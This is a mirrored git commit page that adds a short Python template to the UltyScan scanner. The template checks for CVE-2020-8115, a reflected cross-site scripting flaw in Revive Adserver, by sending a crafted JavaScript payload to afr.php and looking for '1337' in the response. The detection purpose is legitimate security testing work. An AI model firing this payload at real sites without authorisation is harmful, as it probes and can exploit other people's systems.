mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 22:46:00 +00:00
UltyScan Documentation Overhaul
This commit is contained in:
12
templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py
Normal file
12
templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py
Normal file
@@ -0,0 +1,12 @@
|
||||
# Import any WebDriver class that you would usually import from
|
||||
# selenium.webdriver from the seleniumrequests module
|
||||
import sys
|
||||
from seleniumrequests import Firefox
|
||||
|
||||
url = sys.argv[1]
|
||||
# Simple usage with built-in WebDrivers:
|
||||
webdriver = Firefox()
|
||||
response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url)
|
||||
if '1337' in response.text:
|
||||
print("Vulnerable!")
|
||||
webdriver.quit()
|
||||
Reference in New Issue
Block a user